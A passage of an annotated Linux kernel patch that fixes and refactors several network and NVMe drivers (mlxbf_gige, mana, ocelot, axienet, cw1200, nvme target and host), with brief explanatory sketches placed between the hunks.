+ #define MLXBF_GIGE_RX_MAC_FILTER_COUNT_DISC           0x0540
+ #define MLXBF_GIGE_RX_MAC_FILTER_COUNT_DISC_EN        BIT(0)
+ #define MLXBF_GIGE_RX_MAC_FILTER_COUNT_PASS           0x0548
+diff --git a/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_rx.c b/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_rx.c
+index 6999843584934..eb62620b63c7f 100644
+--- a/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_rx.c
++++ b/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_rx.c
+@@ -11,15 +11,31 @@
+ #include "mlxbf_gige.h"
+ #include "mlxbf_gige_regs.h"
+ 
+-void mlxbf_gige_set_mac_rx_filter(struct mlxbf_gige *priv,
+-				  unsigned int index, u64 dmac)
++void mlxbf_gige_enable_multicast_rx(struct mlxbf_gige *priv)
+ {
+ 	void __iomem *base = priv->base;
+-	u64 control;
++	u64 data;
+ 
+-	/* Write destination MAC to specified MAC RX filter */
+-	writeq(dmac, base + MLXBF_GIGE_RX_MAC_FILTER +
+-	       (index * MLXBF_GIGE_RX_MAC_FILTER_STRIDE));
++	data = readq(base + MLXBF_GIGE_RX_MAC_FILTER_GENERAL);
++	data |= MLXBF_GIGE_RX_MAC_FILTER_EN_MULTICAST;
++	writeq(data, base + MLXBF_GIGE_RX_MAC_FILTER_GENERAL);
++}
++
++void mlxbf_gige_disable_multicast_rx(struct mlxbf_gige *priv)
++{
++	void __iomem *base = priv->base;
++	u64 data;
++
++	data = readq(base + MLXBF_GIGE_RX_MAC_FILTER_GENERAL);
++	data &= ~MLXBF_GIGE_RX_MAC_FILTER_EN_MULTICAST;
++	writeq(data, base + MLXBF_GIGE_RX_MAC_FILTER_GENERAL);
++}
++
++void mlxbf_gige_enable_mac_rx_filter(struct mlxbf_gige *priv,
++				     unsigned int index)
++{
++	void __iomem *base = priv->base;
++	u64 control;
+ 
+ 	/* Enable MAC receive filter mask for specified index */
+ 	control = readq(base + MLXBF_GIGE_CONTROL);
+@@ -27,6 +43,28 @@ void mlxbf_gige_set_mac_rx_filter(struct mlxbf_gige *priv,
+ 	writeq(control, base + MLXBF_GIGE_CONTROL);
+ }
+ 
++void mlxbf_gige_disable_mac_rx_filter(struct mlxbf_gige *priv,
++				      unsigned int index)
++{
++	void __iomem *base = priv->base;
++	u64 control;
++
++	/* Disable MAC receive filter mask for specified index */
++	control = readq(base + MLXBF_GIGE_CONTROL);
++	control &= ~(MLXBF_GIGE_CONTROL_EN_SPECIFIC_MAC << index);
++	writeq(control, base + MLXBF_GIGE_CONTROL);
++}
++
++void mlxbf_gige_set_mac_rx_filter(struct mlxbf_gige *priv,
++				  unsigned int index, u64 dmac)
++{
++	void __iomem *base = priv->base;
++
++	/* Write destination MAC to specified MAC RX filter */
++	writeq(dmac, base + MLXBF_GIGE_RX_MAC_FILTER +
++	       (index * MLXBF_GIGE_RX_MAC_FILTER_STRIDE));
++}
++
+ void mlxbf_gige_get_mac_rx_filter(struct mlxbf_gige *priv,
+ 				  unsigned int index, u64 *dmac)
+ {
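
The new mlxbf_gige enable/disable helpers above are plain set/clear
read-modify-writes on a 64-bit MMIO register. A minimal sketch of that shape,
assuming a hypothetical register offset and enable bit:

#include <linux/io.h>
#include <linux/bits.h>

#define DEMO_FILTER_REG    0x0530
#define DEMO_EN_MULTICAST  BIT(1)

static void demo_enable_multicast(void __iomem *base)
{
	u64 data = readq(base + DEMO_FILTER_REG);

	data |= DEMO_EN_MULTICAST;	/* set only the enable bit */
	writeq(data, base + DEMO_FILTER_REG);
}

static void demo_disable_multicast(void __iomem *base)
{
	u64 data = readq(base + DEMO_FILTER_REG);

	data &= ~DEMO_EN_MULTICAST;	/* clear only the enable bit */
	writeq(data, base + DEMO_FILTER_REG);
}
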
+diff --git a/drivers/net/ethernet/microsoft/mana/mana.h b/drivers/net/ethernet/microsoft/mana/mana.h
+index d58be64374c84..41c99eabf40a0 100644
+--- a/drivers/net/ethernet/microsoft/mana/mana.h
++++ b/drivers/net/ethernet/microsoft/mana/mana.h
+@@ -262,6 +262,7 @@ struct mana_cq {
+ 	/* NAPI data */
+ 	struct napi_struct napi;
+ 	int work_done;
++	int work_done_since_doorbell;
+ 	int budget;
+ };
+ 
+diff --git a/drivers/net/ethernet/microsoft/mana/mana_en.c b/drivers/net/ethernet/microsoft/mana/mana_en.c
+index b751b03eddfb1..e7d1ce68f05e3 100644
+--- a/drivers/net/ethernet/microsoft/mana/mana_en.c
++++ b/drivers/net/ethernet/microsoft/mana/mana_en.c
+@@ -1311,7 +1311,6 @@ static void mana_poll_rx_cq(struct mana_cq *cq)
+ static int mana_cq_handler(void *context, struct gdma_queue *gdma_queue)
+ {
+ 	struct mana_cq *cq = context;
+-	u8 arm_bit;
+ 	int w;
+ 
+ 	WARN_ON_ONCE(cq->gdma_cq != gdma_queue);
+@@ -1322,16 +1321,23 @@ static int mana_cq_handler(void *context, struct gdma_queue *gdma_queue)
+ 		mana_poll_tx_cq(cq);
+ 
+ 	w = cq->work_done;
+-
+-	if (w < cq->budget &&
+-	    napi_complete_done(&cq->napi, w)) {
+-		arm_bit = SET_ARM_BIT;
+-	} else {
+-		arm_bit = 0;
++	cq->work_done_since_doorbell += w;
++
++	if (w < cq->budget) {
++		mana_gd_ring_cq(gdma_queue, SET_ARM_BIT);
++		cq->work_done_since_doorbell = 0;
++		napi_complete_done(&cq->napi, w);
++	} else if (cq->work_done_since_doorbell >
++		   cq->gdma_cq->queue_size / COMP_ENTRY_SIZE * 4) {
++		/* MANA hardware requires at least one doorbell ring every 8
++		 * wraparounds of CQ even if there is no need to arm the CQ.
++		 * This driver rings the doorbell as soon as we have exceeded
++		 * 4 wraparounds.
++		 */
++		mana_gd_ring_cq(gdma_queue, 0);
++		cq->work_done_since_doorbell = 0;
+ 	}
+ 
+-	mana_gd_ring_cq(gdma_queue, arm_bit);
+-
+ 	return w;
+ }
+ 
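
The mana change above forces a doorbell once the completions processed since
the last ring exceed four CQ wraparounds, comfortably inside the hardware's
eight-wraparound requirement. A back-of-the-envelope check of that threshold;
the queue and entry sizes here are assumptions for illustration only:

#include <stdio.h>

int main(void)
{
	unsigned int queue_size = 65536;	/* CQ bytes, hypothetical */
	unsigned int comp_entry_size = 64;	/* bytes per CQE, hypothetical */
	unsigned int entries_per_wrap = queue_size / comp_entry_size;
	unsigned int threshold = entries_per_wrap * 4;

	printf("CQ holds %u entries; doorbell forced after %u completions\n",
	       entries_per_wrap, threshold);
	/* Ringing at 4 wraparounds leaves margin under the 8-wraparound
	 * limit even when NAPI stays saturated and never re-arms the CQ.
	 */
	return 0;
}
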
+diff --git a/drivers/net/ethernet/mscc/ocelot.c b/drivers/net/ethernet/mscc/ocelot.c
+index 01b6e13f4692f..310a36356f568 100644
+--- a/drivers/net/ethernet/mscc/ocelot.c
++++ b/drivers/net/ethernet/mscc/ocelot.c
+@@ -994,6 +994,48 @@ void ocelot_ptp_rx_timestamp(struct ocelot *ocelot, struct sk_buff *skb,
+ }
+ EXPORT_SYMBOL(ocelot_ptp_rx_timestamp);
+ 
++void ocelot_lock_inj_grp(struct ocelot *ocelot, int grp)
++			 __acquires(&ocelot->inj_lock)
++{
++	spin_lock(&ocelot->inj_lock);
++}
++EXPORT_SYMBOL_GPL(ocelot_lock_inj_grp);
++
++void ocelot_unlock_inj_grp(struct ocelot *ocelot, int grp)
++			   __releases(&ocelot->inj_lock)
++{
++	spin_unlock(&ocelot->inj_lock);
++}
++EXPORT_SYMBOL_GPL(ocelot_unlock_inj_grp);
++
++void ocelot_lock_xtr_grp(struct ocelot *ocelot, int grp)
++			 __acquires(&ocelot->inj_lock)
++{
++	spin_lock(&ocelot->inj_lock);
++}
++EXPORT_SYMBOL_GPL(ocelot_lock_xtr_grp);
++
++void ocelot_unlock_xtr_grp(struct ocelot *ocelot, int grp)
++			   __releases(&ocelot->inj_lock)
++{
++	spin_unlock(&ocelot->inj_lock);
++}
++EXPORT_SYMBOL_GPL(ocelot_unlock_xtr_grp);
++
++void ocelot_lock_xtr_grp_bh(struct ocelot *ocelot, int grp)
++			    __acquires(&ocelot->xtr_lock)
++{
++	spin_lock_bh(&ocelot->xtr_lock);
++}
++EXPORT_SYMBOL_GPL(ocelot_lock_xtr_grp_bh);
++
++void ocelot_unlock_xtr_grp_bh(struct ocelot *ocelot, int grp)
++			      __releases(&ocelot->xtr_lock)
++{
++	spin_unlock_bh(&ocelot->xtr_lock);
++}
++EXPORT_SYMBOL_GPL(ocelot_unlock_xtr_grp_bh);
++
+ int ocelot_xtr_poll_frame(struct ocelot *ocelot, int grp, struct sk_buff **nskb)
+ {
+ 	u64 timestamp, src_port, len;
+@@ -1004,6 +1046,8 @@ int ocelot_xtr_poll_frame(struct ocelot *ocelot, int grp, struct sk_buff **nskb)
+ 	u32 val, *buf;
+ 	int err;
+ 
++	lockdep_assert_held(&ocelot->xtr_lock);
++
+ 	err = ocelot_xtr_poll_xfh(ocelot, grp, xfh);
+ 	if (err)
+ 		return err;
+@@ -1079,6 +1123,8 @@ bool ocelot_can_inject(struct ocelot *ocelot, int grp)
+ {
+ 	u32 val = ocelot_read(ocelot, QS_INJ_STATUS);
+ 
++	lockdep_assert_held(&ocelot->inj_lock);
++
+ 	if (!(val & QS_INJ_STATUS_FIFO_RDY(BIT(grp))))
+ 		return false;
+ 	if (val & QS_INJ_STATUS_WMARK_REACHED(BIT(grp)))
+@@ -1088,28 +1134,55 @@ bool ocelot_can_inject(struct ocelot *ocelot, int grp)
+ }
+ EXPORT_SYMBOL(ocelot_can_inject);
+ 
+-void ocelot_ifh_port_set(void *ifh, int port, u32 rew_op, u32 vlan_tag)
++/**
++ * ocelot_ifh_set_basic - Set basic information in Injection Frame Header
++ * @ifh: Pointer to Injection Frame Header memory
++ * @ocelot: Switch private data structure
++ * @port: Egress port number
++ * @rew_op: Egress rewriter operation for PTP
++ * @skb: Pointer to socket buffer (packet)
++ *
++ * Populate the Injection Frame Header with basic information for this skb: the
++ * analyzer bypass bit, destination port, VLAN info, egress rewriter info.
++ */
++void ocelot_ifh_set_basic(void *ifh, struct ocelot *ocelot, int port,
++			  u32 rew_op, struct sk_buff *skb)
+ {
++	struct ocelot_port *ocelot_port = ocelot->ports[port];
++	struct net_device *dev = skb->dev;
++	u64 vlan_tci, tag_type;
++	int qos_class;
++
++	ocelot_xmit_get_vlan_info(skb, ocelot_port->bridge, &vlan_tci,
++				  &tag_type);
++
++	qos_class = netdev_get_num_tc(dev) ?
++		    netdev_get_prio_tc_map(dev, skb->priority) : skb->priority;
++
++	memset(ifh, 0, OCELOT_TAG_LEN);
+ 	ocelot_ifh_set_bypass(ifh, 1);
++	ocelot_ifh_set_src(ifh, BIT_ULL(ocelot->num_phys_ports));
+ 	ocelot_ifh_set_dest(ifh, BIT_ULL(port));
+-	ocelot_ifh_set_tag_type(ifh, IFH_TAG_TYPE_C);
+-	if (vlan_tag)
+-		ocelot_ifh_set_vlan_tci(ifh, vlan_tag);
++	ocelot_ifh_set_qos_class(ifh, qos_class);
++	ocelot_ifh_set_tag_type(ifh, tag_type);
++	ocelot_ifh_set_vlan_tci(ifh, vlan_tci);
+ 	if (rew_op)
+ 		ocelot_ifh_set_rew_op(ifh, rew_op);
+ }
+-EXPORT_SYMBOL(ocelot_ifh_port_set);
++EXPORT_SYMBOL(ocelot_ifh_set_basic);
+ 
+ void ocelot_port_inject_frame(struct ocelot *ocelot, int port, int grp,
+ 			      u32 rew_op, struct sk_buff *skb)
+ {
+-	u32 ifh[OCELOT_TAG_LEN / 4] = {0};
++	u32 ifh[OCELOT_TAG_LEN / 4];
+ 	unsigned int i, count, last;
+ 
++	lockdep_assert_held(&ocelot->inj_lock);
++
+ 	ocelot_write_rix(ocelot, QS_INJ_CTRL_GAP_SIZE(1) |
+ 			 QS_INJ_CTRL_SOF, QS_INJ_CTRL, grp);
+ 
+-	ocelot_ifh_port_set(ifh, port, rew_op, skb_vlan_tag_get(skb));
++	ocelot_ifh_set_basic(ifh, ocelot, port, rew_op, skb);
+ 
+ 	for (i = 0; i < OCELOT_TAG_LEN / 4; i++)
+ 		ocelot_write_rix(ocelot, ifh[i], QS_INJ_WR, grp);
+@@ -1142,6 +1215,8 @@ EXPORT_SYMBOL(ocelot_port_inject_frame);
+ 
+ void ocelot_drain_cpu_queue(struct ocelot *ocelot, int grp)
+ {
++	lockdep_assert_held(&ocelot->xtr_lock);
++
+ 	while (ocelot_read(ocelot, QS_XTR_DATA_PRESENT) & BIT(grp))
+ 		ocelot_read_rix(ocelot, QS_XTR_RD, grp);
+ }
+@@ -2733,6 +2808,8 @@ int ocelot_init(struct ocelot *ocelot)
+ 	mutex_init(&ocelot->tas_lock);
+ 	spin_lock_init(&ocelot->ptp_clock_lock);
+ 	spin_lock_init(&ocelot->ts_id_lock);
++	spin_lock_init(&ocelot->inj_lock);
++	spin_lock_init(&ocelot->xtr_lock);
+ 
+ 	ocelot->owq = alloc_ordered_workqueue("ocelot-owq", 0);
+ 	if (!ocelot->owq)
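
The ocelot hunks above pair thin lock wrappers carrying sparse context
annotations with lockdep_assert_held() at the functions that require the
lock. A sketch of that pattern, with the structure and names illustrative
rather than the ocelot API:

#include <linux/spinlock.h>
#include <linux/lockdep.h>

struct demo_switch {
	spinlock_t xtr_lock;
};

static void demo_lock_xtr(struct demo_switch *sw)
	__acquires(&sw->xtr_lock)
{
	spin_lock_bh(&sw->xtr_lock);
}

static void demo_unlock_xtr(struct demo_switch *sw)
	__releases(&sw->xtr_lock)
{
	spin_unlock_bh(&sw->xtr_lock);
}

static void demo_poll_frame(struct demo_switch *sw)
{
	/* Fails loudly under CONFIG_PROVE_LOCKING if a caller forgot
	 * demo_lock_xtr(); documents the contract in normal builds.
	 */
	lockdep_assert_held(&sw->xtr_lock);
	/* ... drain the extraction FIFO ... */
}
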
+diff --git a/drivers/net/ethernet/mscc/ocelot_fdma.c b/drivers/net/ethernet/mscc/ocelot_fdma.c
+index 8e3894cf5f7cd..cc9bce5a4dcdf 100644
+--- a/drivers/net/ethernet/mscc/ocelot_fdma.c
++++ b/drivers/net/ethernet/mscc/ocelot_fdma.c
+@@ -665,8 +665,7 @@ static int ocelot_fdma_prepare_skb(struct ocelot *ocelot, int port, u32 rew_op,
+ 
+ 	ifh = skb_push(skb, OCELOT_TAG_LEN);
+ 	skb_put(skb, ETH_FCS_LEN);
+-	memset(ifh, 0, OCELOT_TAG_LEN);
+-	ocelot_ifh_port_set(ifh, port, rew_op, skb_vlan_tag_get(skb));
++	ocelot_ifh_set_basic(ifh, ocelot, port, rew_op, skb);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/net/ethernet/mscc/ocelot_vsc7514.c b/drivers/net/ethernet/mscc/ocelot_vsc7514.c
+index 6f22aea08a644..bf39a053dc82f 100644
+--- a/drivers/net/ethernet/mscc/ocelot_vsc7514.c
++++ b/drivers/net/ethernet/mscc/ocelot_vsc7514.c
+@@ -159,6 +159,8 @@ static irqreturn_t ocelot_xtr_irq_handler(int irq, void *arg)
+ 	struct ocelot *ocelot = arg;
+ 	int grp = 0, err;
+ 
++	ocelot_lock_xtr_grp(ocelot, grp);
++
+ 	while (ocelot_read(ocelot, QS_XTR_DATA_PRESENT) & BIT(grp)) {
+ 		struct sk_buff *skb;
+ 
+@@ -177,6 +179,8 @@ static irqreturn_t ocelot_xtr_irq_handler(int irq, void *arg)
+ 	if (err < 0)
+ 		ocelot_drain_cpu_queue(ocelot, 0);
+ 
++	ocelot_unlock_xtr_grp(ocelot, grp);
++
+ 	return IRQ_HANDLED;
+ }
+ 
+diff --git a/drivers/net/ethernet/xilinx/xilinx_axienet.h b/drivers/net/ethernet/xilinx/xilinx_axienet.h
+index 6370c447ac5ca..503c32413474a 100644
+--- a/drivers/net/ethernet/xilinx/xilinx_axienet.h
++++ b/drivers/net/ethernet/xilinx/xilinx_axienet.h
+@@ -159,16 +159,17 @@
+ #define XAE_RCW1_OFFSET		0x00000404 /* Rx Configuration Word 1 */
+ #define XAE_TC_OFFSET		0x00000408 /* Tx Configuration */
+ #define XAE_FCC_OFFSET		0x0000040C /* Flow Control Configuration */
+-#define XAE_EMMC_OFFSET		0x00000410 /* EMAC mode configuration */
+-#define XAE_PHYC_OFFSET		0x00000414 /* RGMII/SGMII configuration */
++#define XAE_EMMC_OFFSET		0x00000410 /* MAC speed configuration */
++#define XAE_PHYC_OFFSET		0x00000414 /* RX Max Frame Configuration */
+ #define XAE_ID_OFFSET		0x000004F8 /* Identification register */
+-#define XAE_MDIO_MC_OFFSET	0x00000500 /* MII Management Config */
+-#define XAE_MDIO_MCR_OFFSET	0x00000504 /* MII Management Control */
+-#define XAE_MDIO_MWD_OFFSET	0x00000508 /* MII Management Write Data */
+-#define XAE_MDIO_MRD_OFFSET	0x0000050C /* MII Management Read Data */
++#define XAE_MDIO_MC_OFFSET	0x00000500 /* MDIO Setup */
++#define XAE_MDIO_MCR_OFFSET	0x00000504 /* MDIO Control */
++#define XAE_MDIO_MWD_OFFSET	0x00000508 /* MDIO Write Data */
++#define XAE_MDIO_MRD_OFFSET	0x0000050C /* MDIO Read Data */
+ #define XAE_UAW0_OFFSET		0x00000700 /* Unicast address word 0 */
+ #define XAE_UAW1_OFFSET		0x00000704 /* Unicast address word 1 */
+-#define XAE_FMI_OFFSET		0x00000708 /* Filter Mask Index */
++#define XAE_FMI_OFFSET		0x00000708 /* Frame Filter Control */
++#define XAE_FFE_OFFSET		0x0000070C /* Frame Filter Enable */
+ #define XAE_AF0_OFFSET		0x00000710 /* Address Filter 0 */
+ #define XAE_AF1_OFFSET		0x00000714 /* Address Filter 1 */
+ 
+@@ -307,7 +308,7 @@
+  */
+ #define XAE_UAW1_UNICASTADDR_MASK	0x0000FFFF
+ 
+-/* Bit masks for Axi Ethernet FMI register */
++/* Bit masks for Axi Ethernet FMC register */
+ #define XAE_FMI_PM_MASK			0x80000000 /* Promis. mode enable */
+ #define XAE_FMI_IND_MASK		0x00000003 /* Index Mask */
+ 
+diff --git a/drivers/net/ethernet/xilinx/xilinx_axienet_main.c b/drivers/net/ethernet/xilinx/xilinx_axienet_main.c
+index ff777735be66b..59d1cfbf7d6b7 100644
+--- a/drivers/net/ethernet/xilinx/xilinx_axienet_main.c
++++ b/drivers/net/ethernet/xilinx/xilinx_axienet_main.c
+@@ -411,7 +411,7 @@ static int netdev_set_mac_address(struct net_device *ndev, void *p)
+  */
+ static void axienet_set_multicast_list(struct net_device *ndev)
+ {
+-	int i;
++	int i = 0;
+ 	u32 reg, af0reg, af1reg;
+ 	struct axienet_local *lp = netdev_priv(ndev);
+ 
+@@ -429,7 +429,10 @@ static void axienet_set_multicast_list(struct net_device *ndev)
+ 	} else if (!netdev_mc_empty(ndev)) {
+ 		struct netdev_hw_addr *ha;
+ 
+-		i = 0;
++		reg = axienet_ior(lp, XAE_FMI_OFFSET);
++		reg &= ~XAE_FMI_PM_MASK;
++		axienet_iow(lp, XAE_FMI_OFFSET, reg);
++
+ 		netdev_for_each_mc_addr(ha, ndev) {
+ 			if (i >= XAE_MULTICAST_CAM_TABLE_NUM)
+ 				break;
+@@ -448,6 +451,7 @@ static void axienet_set_multicast_list(struct net_device *ndev)
+ 			axienet_iow(lp, XAE_FMI_OFFSET, reg);
+ 			axienet_iow(lp, XAE_AF0_OFFSET, af0reg);
+ 			axienet_iow(lp, XAE_AF1_OFFSET, af1reg);
++			axienet_iow(lp, XAE_FFE_OFFSET, 1);
+ 			i++;
+ 		}
+ 	} else {
+@@ -455,18 +459,15 @@ static void axienet_set_multicast_list(struct net_device *ndev)
+ 		reg &= ~XAE_FMI_PM_MASK;
+ 
+ 		axienet_iow(lp, XAE_FMI_OFFSET, reg);
+-
+-		for (i = 0; i < XAE_MULTICAST_CAM_TABLE_NUM; i++) {
+-			reg = axienet_ior(lp, XAE_FMI_OFFSET) & 0xFFFFFF00;
+-			reg |= i;
+-
+-			axienet_iow(lp, XAE_FMI_OFFSET, reg);
+-			axienet_iow(lp, XAE_AF0_OFFSET, 0);
+-			axienet_iow(lp, XAE_AF1_OFFSET, 0);
+-		}
+-
+ 		dev_info(&ndev->dev, "Promiscuous mode disabled.\n");
+ 	}
++
++	for (; i < XAE_MULTICAST_CAM_TABLE_NUM; i++) {
++		reg = axienet_ior(lp, XAE_FMI_OFFSET) & 0xFFFFFF00;
++		reg |= i;
++		axienet_iow(lp, XAE_FMI_OFFSET, reg);
++		axienet_iow(lp, XAE_FFE_OFFSET, 0);
++	}
+ }
+ 
+ /**
+diff --git a/drivers/net/gtp.c b/drivers/net/gtp.c
+index 05b5914d83582..512daeb14e28b 100644
+--- a/drivers/net/gtp.c
++++ b/drivers/net/gtp.c
+@@ -900,6 +900,9 @@ static netdev_tx_t gtp_dev_xmit(struct sk_buff *skb, struct net_device *dev)
+ 	if (skb_cow_head(skb, dev->needed_headroom))
+ 		goto tx_err;
+ 
++	if (!pskb_inet_may_pull(skb))
++		goto tx_err;
++
+ 	skb_reset_inner_headers(skb);
+ 
+ 	/* PDP context lookups in gtp_build_skb_*() need rcu read-side lock. */
+diff --git a/drivers/net/ppp/pppoe.c b/drivers/net/ppp/pppoe.c
+index ce2cbb5903d7b..c6f44af35889d 100644
+--- a/drivers/net/ppp/pppoe.c
++++ b/drivers/net/ppp/pppoe.c
+@@ -1007,26 +1007,21 @@ static int pppoe_recvmsg(struct socket *sock, struct msghdr *m,
+ 	struct sk_buff *skb;
+ 	int error = 0;
+ 
+-	if (sk->sk_state & PPPOX_BOUND) {
+-		error = -EIO;
+-		goto end;
+-	}
++	if (sk->sk_state & PPPOX_BOUND)
++		return -EIO;
+ 
+ 	skb = skb_recv_datagram(sk, flags, &error);
+-	if (error < 0)
+-		goto end;
++	if (!skb)
++		return error;
+ 
+-	if (skb) {
+-		total_len = min_t(size_t, total_len, skb->len);
+-		error = skb_copy_datagram_msg(skb, 0, m, total_len);
+-		if (error == 0) {
+-			consume_skb(skb);
+-			return total_len;
+-		}
++	total_len = min_t(size_t, total_len, skb->len);
++	error = skb_copy_datagram_msg(skb, 0, m, total_len);
++	if (error == 0) {
++		consume_skb(skb);
++		return total_len;
+ 	}
+ 
+ 	kfree_skb(skb);
+-end:
+ 	return error;
+ }
+ 
+diff --git a/drivers/net/wireless/intel/iwlwifi/fw/debugfs.c b/drivers/net/wireless/intel/iwlwifi/fw/debugfs.c
+index 607e07ed2477c..7d4340c56628a 100644
+--- a/drivers/net/wireless/intel/iwlwifi/fw/debugfs.c
++++ b/drivers/net/wireless/intel/iwlwifi/fw/debugfs.c
+@@ -163,7 +163,11 @@ static int iwl_dbgfs_enabled_severities_write(struct iwl_fw_runtime *fwrt,
+ 
+ 	event_cfg.enabled_severities = cpu_to_le32(enabled_severities);
+ 
+-	ret = iwl_trans_send_cmd(fwrt->trans, &hcmd);
++	if (fwrt->ops && fwrt->ops->send_hcmd)
++		ret = fwrt->ops->send_hcmd(fwrt->ops_ctx, &hcmd);
++	else
++		ret = -EPERM;
++
+ 	IWL_INFO(fwrt,
+ 		 "sent host event cfg with enabled_severities: %u, ret: %d\n",
+ 		 enabled_severities, ret);
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/scan.c b/drivers/net/wireless/intel/iwlwifi/mvm/scan.c
+index 069bac72117fe..b58441c2af730 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/scan.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/scan.c
+@@ -3226,7 +3226,7 @@ int iwl_mvm_scan_stop(struct iwl_mvm *mvm, int type, bool notify)
+ 	if (!(mvm->scan_status & type))
+ 		return 0;
+ 
+-	if (iwl_mvm_is_radio_killed(mvm)) {
++	if (!test_bit(STATUS_DEVICE_ENABLED, &mvm->trans->status)) {
+ 		ret = 0;
+ 		goto out;
+ 	}
+diff --git a/drivers/net/wireless/marvell/mwifiex/11n_rxreorder.c b/drivers/net/wireless/marvell/mwifiex/11n_rxreorder.c
+index 54ab8b54369ba..4ab3a14567b65 100644
+--- a/drivers/net/wireless/marvell/mwifiex/11n_rxreorder.c
++++ b/drivers/net/wireless/marvell/mwifiex/11n_rxreorder.c
+@@ -33,7 +33,7 @@ static int mwifiex_11n_dispatch_amsdu_pkt(struct mwifiex_private *priv,
+ 		skb_trim(skb, le16_to_cpu(local_rx_pd->rx_pkt_length));
+ 
+ 		ieee80211_amsdu_to_8023s(skb, &list, priv->curr_addr,
+-					 priv->wdev.iftype, 0, NULL, NULL);
++					 priv->wdev.iftype, 0, NULL, NULL, false);
+ 
+ 		while (!skb_queue_empty(&list)) {
+ 			struct rx_packet_hdr *rx_hdr;
+diff --git a/drivers/net/wireless/st/cw1200/txrx.c b/drivers/net/wireless/st/cw1200/txrx.c
+index 6894b919ff94b..e16e9ae90d204 100644
+--- a/drivers/net/wireless/st/cw1200/txrx.c
++++ b/drivers/net/wireless/st/cw1200/txrx.c
+@@ -1166,7 +1166,7 @@ void cw1200_rx_cb(struct cw1200_common *priv,
+ 		size_t ies_len = skb->len - (ies - (u8 *)(skb->data));
+ 
+ 		tim_ie = cfg80211_find_ie(WLAN_EID_TIM, ies, ies_len);
+-		if (tim_ie) {
++		if (tim_ie && tim_ie[1] >= sizeof(struct ieee80211_tim_ie)) {
+ 			struct ieee80211_tim_ie *tim =
+ 				(struct ieee80211_tim_ie *)&tim_ie[2];
+ 
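
The cw1200 fix above checks the information element's own length byte before
casting its body to a structure. A reduced sketch of that bounds check; the
TIM layout here mirrors the 802.11 element but the type is illustrative:

#include <stdint.h>
#include <stddef.h>

struct demo_tim {
	uint8_t dtim_count;
	uint8_t dtim_period;
	uint8_t bitmap_ctrl;
	uint8_t virtual_map[1];
};

static const struct demo_tim *demo_parse_tim(const uint8_t *ie)
{
	/* ie[0] is the element ID, ie[1] the body length */
	if (ie[1] < sizeof(struct demo_tim))
		return NULL;	/* truncated element: don't touch the body */
	return (const struct demo_tim *)&ie[2];
}
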
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index 1aff793a1d77e..0729ab5430725 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -1366,8 +1366,10 @@ static int nvme_identify_ctrl(struct nvme_ctrl *dev, struct nvme_id_ctrl **id)
+ 
+ 	error = nvme_submit_sync_cmd(dev->admin_q, &c, *id,
+ 			sizeof(struct nvme_id_ctrl));
+-	if (error)
++	if (error) {
+ 		kfree(*id);
++		*id = NULL;
++	}
+ 	return error;
+ }
+ 
+@@ -1496,6 +1498,7 @@ static int nvme_identify_ns(struct nvme_ctrl *ctrl, unsigned nsid,
+ 	if (error) {
+ 		dev_warn(ctrl->device, "Identify namespace failed (%d)\n", error);
+ 		kfree(*id);
++		*id = NULL;
+ 	}
+ 	return error;
+ }
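
Both nvme identify paths above now clear the out-pointer after kfree(), so a
caller that checks only the return code can never be left holding a dangling
pointer. A sketch of that error-path convention, with the query callback and
size as placeholders:

#include <linux/slab.h>
#include <linux/errno.h>

static int demo_identify(void **out, int (*query)(void *buf))
{
	int error;

	*out = kzalloc(4096, GFP_KERNEL);
	if (!*out)
		return -ENOMEM;

	error = query(*out);
	if (error) {
		kfree(*out);
		*out = NULL;	/* callers may inspect *out regardless of rc */
	}
	return error;
}
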
+diff --git a/drivers/nvme/target/rdma.c b/drivers/nvme/target/rdma.c
+index 4597bca43a6d8..a6d55ebb82382 100644
+--- a/drivers/nvme/target/rdma.c
++++ b/drivers/nvme/target/rdma.c
+@@ -473,12 +473,8 @@ nvmet_rdma_alloc_rsps(struct nvmet_rdma_queue *queue)
+ 	return 0;
+ 
+ out_free:
+-	while (--i >= 0) {
+-		struct nvmet_rdma_rsp *rsp = &queue->rsps[i];
+-
+-		list_del(&rsp->free_list);
+-		nvmet_rdma_free_rsp(ndev, rsp);
+-	}
++	while (--i >= 0)
++		nvmet_rdma_free_rsp(ndev, &queue->rsps[i]);
+ 	kfree(queue->rsps);
+ out:
+ 	return ret;
+@@ -489,12 +485,8 @@ static void nvmet_rdma_free_rsps(struct nvmet_rdma_queue *queue)
+ 	struct nvmet_rdma_device *ndev = queue->dev;
+ 	int i, nr_rsps = queue->recv_queue_size * 2;
+ 
+-	for (i = 0; i < nr_rsps; i++) {
+-		struct nvmet_rdma_rsp *rsp = &queue->rsps[i];
+-
+-		list_del(&rsp->free_list);
+-		nvmet_rdma_free_rsp(ndev, rsp);
+-	}
++	for (i = 0; i < nr_rsps; i++)
++		nvmet_rdma_free_rsp(ndev, &queue->rsps[i]);
+ 	kfree(queue->rsps);
+ }
+ 
+diff --git a/drivers/nvme/target/tcp.c b/drivers/nvme/target/tcp.c
+index 5556f55880411..76b9eb438268f 100644
+--- a/drivers/nvme/target/tcp.c
++++ b/drivers/nvme/target/tcp.c
+@@ -836,6 +836,7 @@ static int nvmet_tcp_handle_icreq(struct nvmet_tcp_queue *queue)
+ 		pr_err("bad nvme-tcp pdu length (%d)\n",
+ 			le32_to_cpu(icreq->hdr.plen));
+ 		nvmet_tcp_fatal_error(queue);
++		return -EPROTO;
+ 	}
+ 
+ 	if (icreq->pfv != NVME_TCP_PFV_1_0) {
+diff --git a/drivers/nvme/target/trace.c b/drivers/nvme/target/trace.c
+index bff454d46255b..6ee1f3db81d04 100644
+--- a/drivers/nvme/target/trace.c
++++ b/drivers/nvme/target/trace.c
+@@ -211,7 +211,7 @@ const char *nvmet_trace_disk_name(struct trace_seq *p, char *name)
+ 	return ret;
+ }
+ 
+-const char *nvmet_trace_ctrl_name(struct trace_seq *p, struct nvmet_ctrl *ctrl)
++const char *nvmet_trace_ctrl_id(struct trace_seq *p, u16 ctrl_id)
+ {
+ 	const char *ret = trace_seq_buffer_ptr(p);
